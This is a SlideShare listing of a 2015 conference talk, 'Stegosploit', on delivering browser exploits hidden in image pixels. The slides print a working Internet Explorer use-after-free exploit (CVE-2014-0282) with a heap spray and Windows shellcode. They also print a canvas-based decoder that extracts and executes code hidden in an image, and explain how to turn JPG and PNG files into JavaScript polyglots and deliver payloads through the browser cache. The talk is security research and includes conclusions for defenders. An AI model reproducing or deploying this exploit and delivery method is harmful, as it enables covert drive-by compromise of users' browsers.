44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
4 likes2,052 views
Saumil Shah presents Stegosploit, a technique for hiding browser exploits in images using steganography. The encoded exploit payload is hidden in the least significant bits of image pixels. When the image is loaded in a browser, the encoded exploit is automatically decoded and triggered without any visual distortion of the image. This allows delivering browser exploits covertly via innocent-looking images. Shah outlines various techniques for encoding exploits in JPEG and PNG images while overcoming lossy compression. The presentation concludes with discussions on the offensive opportunities and defensive challenges of such image-based attacks.
![net-square
kevin.jpg
Face Painting an Exploit
function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;fthis.d.length;f+
+){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length8){c='0'+c}var l=function(a)
{return(parseInt(c.substr(a,2),16))};var
g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var
d=0;dn.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;ca.data.length;c++,b
++){if(b=8192){b=0}a.data[c]=(bthis.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var
b=0;bd;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var
a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a)
{this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc
xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a
x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c
x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b
x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b
x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a
x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb
xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff
xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b1104;b+=4){c.push(1371756628)}
c.push(1371756627);c.push(1371351263);var
f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212
48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var
a=0;a100;a++){c.push(document.createElement('img'))}if(flag)
{document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a110;a+=2){b
+='u4242'}for(var a=0;ac.length;a++){c[a].title=b}}}function run()
{spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag=
true;document.getElementById('fm').reset()}setTimeout(run,1000);
IE Use-After-Free CVE-2014-0282](https://image.slidesharecdn.com/keepcalmandstegosploit44con2015-3-150922092300-lva1-app6892/85/44CON-London-2015-Stegosploit-Drive-by-Browser-Exploits-using-only-Images-18-320.jpg)
![net-square
The Decoder
var bL=2,eC=3,gr=3;function i0(){px.onclick=dID}function dID(){var
b=document.createElement(canvas);px.parentNode.insertBefore(b,px);b.width
=px.width;b.height=px.height;var m=b.getContext(2d);m.drawImage(px,
0,0);px.parentNode.removeChild(px);var
f=m.getImageData(0,0,b.width,b.height).data;var h=[],j=0,g=0;var
c=function(p,o,u){n=(u*b.width+o)*4;var z=1bL;var s=(p[n]z)bL;var
q=(p[n+1]z)bL;var a=(p[n+2]z)bL;var t=Math.round((s+q+a)/
3);switch(eC){case 0:t=s;break;case 1:t=q;break;case 2:t=a;break;}
return(String.fromCharCode(t+48))};var k=function(a){for(var
q=0,o=0;oa*8;o++){h[q++]=c(f,j,g);j+=gr;if(j=b.width){j=0;g
+=gr}}};k(6);var d=parseInt(bTS(h.join()));k(d);try{CollectGarbage()}
catch(e){}exc(bTS(h.join()))}function bTS(b){var
a=;for(i=0;ib.length;i+=8)a+=String.fromCharCode(parseInt(b.substr(i,8),
2));return(a)}function exc(b){var a=setTimeout((new Function(b)),100)}
window.onload=i0;](https://image.slidesharecdn.com/keepcalmandstegosploit44con2015-3-150922092300-lva1-app6892/85/44CON-London-2015-Stegosploit-Drive-by-Browser-Exploits-using-only-Images-27-320.jpg)
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
- 2. net-square About Me @therealsaumil saumilshah hacker, trainer, speaker, author, photographer educating, entertaining and exasperating audiences since 1999 Saumil Shah CEO, Net-Square
- 3. net-square
- 4. net-square UNFORTUNATELY, NO ONE CAN BE TOLD. . . . . . WHAT STEGOSPLOIT IS
- 5. net-square A good exploit is one that is delivered with style
- 6. net-square History • Traditional Steganography • GIFAR concatenation • PHP/ASP webshells appending/ embedding tags ?php..? %..% • XSS in EXIF data
- 7. net-square Stegosploit - Motivations I 3 Photography + I 3 Browser Exploits = I 3 (Photography + Browser Exploits)
- 8. net-square Stegosploit is... not a 0-day attack with a cute logo not exploit code hidden in EXIF not a PHP/ASP webshell not a new XSS vector Stegosploit lets you deliver existing BROWSER EXPLOITS using pictures.
- 10. net-square ...but Exploits are NOT!
- 11. net-square Dangerous Content Is ...Dangerous Attack Payload SAFE decoder DANGEROUS Pixel Data
- 13. net-square Exploit Delivery as seen today BROWSEROBFUSCATED EXPLOIT
- 14. net-square BROWSER STEGO- ENCODER POLYGLOT STEGO- DECODER Exploit Delivery with Stegosploit EXPLOIT
- 15. net-square Hacking with pictures, in style! • Network traffic - ONLY image files. • Exploit hidden in pixels. – no visible aberration or distortion. • Image auto runs upon load. – decoder code bundled WITH the image. • Exploit automatically decoded and triggered. • ...all with 1 image.
- 16. net-square Hiding the Exploit Code in the Image Step 1
- 17. net-square Hiding an Exploit in an Image • Simple steganography techniques. • Encode exploit code bitstream into lesser significant bits of RGB values. • Spread the pixels around e.g. 4x4 grid.
- 18. net-square kevin.jpg Face Painting an Exploit function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;fthis.d.length;f+ +){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length8){c='0'+c}var l=function(a) {return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;dn.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;ca.data.length;c++,b ++){if(b=8192){b=0}a.data[c]=(bthis.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;bd;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a) {this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b1104;b+=4){c.push(1371756628)} c.push(1371756627);c.push(1371351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212 48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a100;a++){c.push(document.createElement('img'))}if(flag) {document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a110;a+=2){b +='u4242'}for(var a=0;ac.length;a++){c[a].title=b}}}function run() {spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag= true;document.getElementById('fm').reset()}setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
- 19. net-square kevin.jpg Bit layer 7 (MSB) Bit layer 6 Bit layer 5 Bit layer 4 Bit layer 3 Bit layer 2 Bit layer 1 Bit layer 0 (LSB) Image separated into Bit Layers
- 20. net-square Encoding data at bit layer 7 Significant visual distortion.
- 21. net-square Encoding data at bit layer 2 Negligble visual distortion while encoding at lower layers.
- 22. net-square Encoding data at bit layer 2 Encoded pixels visible in certain parts when bit layer 2 is filtered and equalized Final encoded image shows no perceptible visual aberration or distortion.
- 23. net-square Encoding on JPG • JPG – lossy compression. • Pixels may be approximated to their nearest neighbours. • Overcoming lossy compression by ITERATIVE ENCODING. • Can't go too deep down the bit layers. • IE's JPG encoder is terrible! • Browser specific JPG quirks.
- 24. net-square Encoding on PNG • Lossless compression. • Can encode at bit layer 0. – minimum visual distortion. • Independent of browser library implementation. • Single pass encoding. • JPG is still more popular than PNG!
- 25. net-square Decoding the encoded Pixel Data Step 2
- 26. net-square HTML5 CANVAS is our friend! • Read image pixel data using JS. • In-browser decoding of steganographically encoded images.
- 27. net-square The Decoder var bL=2,eC=3,gr=3;function i0(){px.onclick=dID}function dID(){var b=document.createElement(canvas);px.parentNode.insertBefore(b,px);b.width =px.width;b.height=px.height;var m=b.getContext(2d);m.drawImage(px, 0,0);px.parentNode.removeChild(px);var f=m.getImageData(0,0,b.width,b.height).data;var h=[],j=0,g=0;var c=function(p,o,u){n=(u*b.width+o)*4;var z=1bL;var s=(p[n]z)bL;var q=(p[n+1]z)bL;var a=(p[n+2]z)bL;var t=Math.round((s+q+a)/ 3);switch(eC){case 0:t=s;break;case 1:t=q;break;case 2:t=a;break;} return(String.fromCharCode(t+48))};var k=function(a){for(var q=0,o=0;oa*8;o++){h[q++]=c(f,j,g);j+=gr;if(j=b.width){j=0;g +=gr}}};k(6);var d=parseInt(bTS(h.join()));k(d);try{CollectGarbage()} catch(e){}exc(bTS(h.join()))}function bTS(b){var a=;for(i=0;ib.length;i+=8)a+=String.fromCharCode(parseInt(b.substr(i,8), 2));return(a)}function exc(b){var a=setTimeout((new Function(b)),100)} window.onload=i0;
- 29. net-square When is an image not an image? When it is Javascript!
- 30. net-square IMAJS I SEE PIXELS I SEE CODE
- 31. net-square IMAJS – The Concept Image Javascript Holy Sh** Bipolar Content! img sees pixels script sees code #YourPointOfView
- 32. net-square img src=# script src=#/script IMAJS - Polyglot
- 33. net-square Hat tip: Michael Zalewski @lcamtuf I JPG All new IMAJS-JPG! JPG +HTML +JS +CSS
- 34. net-square The Secret Sauce shhh.. don't tell anyone
- 35. net-square JPG Secret Sauce Regular JPEG Header FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ... Start marker length next section... J F I F 0 Modified JPEG Header FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker length next section... J F I F 0 whole lot of extra space!
- 36. net-square JPG Secret Sauce Modified JPEG Header See the difference? FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ... Start marker comment! next section...Javascript goes here FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker length next section... J F I F 0 whole lot of extra space!
- 37. net-square I PNG All new IMAJS-PNG! PNG +HTML +JS +CSS
- 38. net-square PNG Secret Sauce - FourCC PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk www.fourcc.org
- 39. net-square PNG Secret Sauce - FourCC PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength html !-- CRC tEXtlength _ random chars ... CRC ... random chars ... -- decoder HTML and script goes here .. script type=text/undefined/*... extra tEXt chunk extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk Inspiration: http://daeken.com/superpacking-js-demos
- 40. net-square The Finer Points of Package Delivery Step 4
- 41. net-square A Few Browser Tricks... Content Sniffing Expires and Cache-Control Clever CSS
- 42. net-square Content Sniffing Credits: Michael Zalewski @lcamtuf
- 43. net-square Dive Into Cache GET /stego.jpg HTTP 200 OK Expires: May 30 2015 GET /stego.jpg o hai o hai
- 44. net-square IE CInput Use-After-Free stego IMAJS PWN! CVE-2014-0282
- 45. net-square Firefox onreadystatechange UAF stego IMAJS PWN! CVE-2013-1690
- 46. net-square
- 47. net-square PAYLOADS GO back in time
- 48. net-square Exploit code encoded in image. EVIL GET /lolcat.png 200 OK Expires: 6 months I'M IN UR BASE Decoder script references image from cache. SAFE GET /lolcat.png Load from cache ....KILLING UR DOODZ AUG 2015 DEC 2015 ATTACK TIMELINE
- 50. net-square Conclusions - Offensive • Lot of possibilities! • Weird containers, weird encoding, weird obfuscation. • Image attacks emerging in the wild. • CANVAS + CORS = spread the payloads. • Not limited to just browsers.
- 51. net-square Conclusions - Defensive • DFIR nightmare. – how far back does your window of inspection go? • Can't rely on extensions, file headers, MIME types or magic numbers. • Wake up call to browser-wallahs. • Quick fix – re-encode all images!